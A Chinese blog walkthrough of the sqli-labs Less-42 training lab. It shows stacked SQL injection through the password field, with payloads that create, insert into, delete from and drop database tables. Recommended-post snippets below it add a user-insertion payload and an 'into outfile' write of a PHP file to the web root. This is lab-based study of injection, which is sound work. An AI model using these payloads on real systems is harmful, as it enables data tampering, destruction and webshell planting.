sqli-labs/Less-42

最新推荐文章于 2024-08-22 09:00:00 发布
最新推荐文章于 2024-08-22 09:00:00 发布
阅读量253 收藏
点赞数
文章标签: 数据库 mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71299382/article/details/127968987
版权

这一关又回到了post请求了

而且这一关不需要进行爆破操作这一关的目的在于尝试堆叠注入

所以我们需要找出那个表单是注入点

我们往两处表单都输入1'

报错了 说明两个表单必定有一处为注入点

首先注入如下

username 1'
password 1

没有报错 

在试试看如下输入

username 1
password 1'

报错了 报错信息如下

所以我们往username随意输入 往password输入单引号 并且进行堆叠注入

首先进行创建表格操作

1';create table demo like users;#

 数据库回显如下所示

然后进行添加数据操作

输入如下

1';insert into demo values(1,'xiaoming','555');#

 数据库回显如下

然后删除数据 输入如下

1';delete from demo where id=1;#

 数据库回显如下

然后进行删除表格操作 输入如下

1';drop table demo;#

 数据库回显如下

这一关就这样子吧 嗨嗨 !!! 

axihaihai
关注
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 2032
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1565
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs (less-42)
kukudeshuo的博客
03-14 1159
sqli-labs (less-42) 进入42关,我们发现与less-24的页面好像一模一样 那这里我们是否能跟less-24一样使用二次注入攻击呢,经过我的各种尝试发现这关使用二次注入是行不通的,这关我们应该使用堆叠注入攻击 利用F12开发者工具将password的位置改为text,用明文查看 创建一张表试试 a';create table test like users;# 再试试创建一个新用户 a';insert into users values(18,'icepeak','icepea
Sqli-labs之Less:42-45
→_→
05-13 586
Less-42 基于存储_POST_单引号_字符型_堆叠注入 这一关看起来和Less-24是一样的界面,实际上是不同的,我们点击 New User click here?可以看到如下: 翻译:你需要创建帐户然后侵入 通过这一关我们了解到了,我们无法进行注册和忘记密码的操作。 我们在Less-24做这种界面的关卡的时候是二次注入,通过越权修改别人的密码,我们这里还是一样,只是改为使用堆...
sqli-labs第42~45关
最新发布
weixin_46023655的博客
08-22 347
sqli-labs第42~45关
sqli-Labs————less-42
Fly_鹏程万里
05-21 1204
Less-42源代码分析:在login.php文件中,我们可以发现以下内容:从上面所指的代码部分我们可以发现,对用户输入的密码没有经过任何的处理操作,因此在登录的时候可以用于注入。payload:username:admin(随意)password:aaa';creat table me like users#(创建表hps)登录之前的四张表:登录之后:这算是一个堆叠注入的一个应用吧!...
sqlilabs less-42~43
TA不懒,但还没有添加简介
08-05 212
sqlilabs less-42~43
sqli-labs靶场练习笔记
11-09
>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的时间盲注** - **特点**:通过观察请求响应时间的变化来判断SQL语句的真假。 - **实现方法**:利用`sleep`...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs ----less-26---37--练习
代码审计
03-07 1003
sqli-labs————Less-26(绕空格、/*、#等) 该关卡提示空格和注释被转义,我们测试一下: http://www.sqli.com/Less-26/?id=1’报错 sqli-labs-master/Less-26/?id=1’ --+ 依旧报错, 我添加的注释不见了,应该是注释被转义成了空字符,我们换成;%00测试一下: http://www.sqli.com/Less-26/?id=1%20and%20sleep(4);%00 and应该被转义了 phpstorm
SQL注入 Less42(POST型堆叠注入)
开心星人的博客
07-28 480
只对username进行了转义操作,而没有对password,所以password是个突破口。那么结果则是整张users表。而Dumb处于第一行,因此登录进去的就是Dumb。这题的页面和二次注入类似,但是我们没法注册用户,所以也就没法使用二次注入。但为什么我们输入的是admin但是登录进去的却是Dumb呢。而and的优先级是高于or的。用万能密码来测试一下password。用password进行堆叠注入。...
sqli-labs(44)
weixin_30808575的博客
06-03 189
第四十四关 本关是基于盲注的,这里盲注主要是要没有报错信息,所以要采用盲注。这关与42关的区别就在于没有报错信息 过滤点: $username = mysqli_real_escape_string($con1, $_POST["login_user"]); $password = $_POST["login_password"]; sql语句: ...
sqli-labs(42)
weixin_30419799的博客
06-03 684
0x01 喔? 熟悉的界面? 注册一下 但是好像不行了 那我们只有 嘻嘻看看页面了 也是以失败告终的 那我们该怎么办 我们来看看源码 我们看见login的页面未对 password进行任何的过滤 那我们尝试一下???堆叠??? 1';insert into users values(99,'zhong',zhong') 但是似乎不行?? ';...
sqlilabs第四十二四十三关
m0_73248913的博客
01-07 407
反正这个我是不会的,用默认脚本没做出来。发现问题passwd这里有注入点。这里就可以修改管理员的密码了。创建一个表加入登入信息。这个也没有自动的方法。
LESS-39-40-41-42-43-44-45
qq_44598397的博客
04-11 429
less-39 第39与38题的区别为本题id没有单引号。 输入:http://127.0.0.1/sqlilabs/Less-39/?id=1; update users set username=‘more’ where id=‘38’ --+(无单引号为错误) LESS-40 本处的区别在于id为‘)闭合方式; 输入:http://127.0.0.1/sqlilabs/Less-40/?i...
Less 42-45 (基于POST的堆叠注入)
老司机开代码的博客
08-04 319
文章目录1. 题目分析2. 注入过程 1. 题目分析 这一关看起来和之前的二次注入的页面挺相似,但是却不能使用二次注入。我们点开发现注册页面是没有功能的。 看一下源码吧: $username = mysqli_real_escape_string($con1, $_POST["login_user"]); $password = $_POST["login_password"]; $sql = "SELECT * FROM users WHERE username='$username' and pass
Sqli-labs less 42
weixin_34015566的博客
08-11 130
Less-42 Update更新数据后,经过mysql_real_escape_string()处理后的数据,存入到数据库当中后不会发生变化。在select调用的时候才能发挥作用。所以不用考虑在更新密码处进行注入,这关和二次注入的思路是不一样的。 本关从login.php源代码中分析可知: Password变量在post过程中,没有通过mysql_real_escape_string()...
sqli-labs/Less-28
01-09
1. 打开sqli-labs实验平台,并找到Less-28实验。 2. 在输入框中输入以下内容进行注入: ``` ' or 1=1)# ``` 这个注入语句的作用是闭合原始查询并使其返回所有结果。 3. 提交注入语句并查看结果。如果页面显示了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

axihaihai

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值